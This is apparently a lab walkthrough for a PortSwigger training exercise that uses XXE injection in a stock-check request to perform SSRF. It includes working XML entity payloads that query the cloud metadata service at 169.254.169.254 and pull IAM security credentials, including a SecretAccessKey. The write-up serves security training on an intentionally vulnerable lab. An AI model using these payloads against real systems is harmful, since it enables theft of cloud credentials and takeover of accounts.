Exploiting XXE to perform SSRF attacks

By /
Exploiting XXE to perform SSRF attacks

Exploiting XXE to perform SSRF attacks

1: Access the Lab.

Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

Lab Exploiting XXE to perform SSRF attacks 1

2: Open the Burp Suite.

3: Select the product.

Lab Exploiting XXE to perform SSRF attacks 2

4: Check the stock units.

Lab Exploiting XXE to perform SSRF attacks 3

5: Send the request to the Repeater.

Shortcut key: Ctrl + R

Lab Exploiting XXE to perform SSRF attacks 4

6: Send the request.

Lab Exploiting XXE to perform SSRF attacks 5

7: Insert the following XXE payload.

Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM “http://169.254.169.254/”> ]>

Lab Exploiting XXE to perform SSRF attacks 6

8: Replace the product ID.

Product ID: &xxe;

9: The response should contain “Invalid product ID:” followed by the response from the metadata endpoint, which will initially be a folder name.

Lab Exploiting XXE to perform SSRF attacks 7

10: Update the URL in the DTD to explore the API until you reach.

URL: /latest/meta-data/iam/security-credentials/admin

Complete URL: <!DOCTYPE test [ <!ENTITY xxe SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/admin”> ]>

11: This should return JSON containing the SecretAccessKey.

Lab Exploiting XXE to perform SSRF attacks 8

12: The Lab has been completed.

Lab Exploiting XXE to perform SSRF attacks 9

PortSwigger Labs

Must Read

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top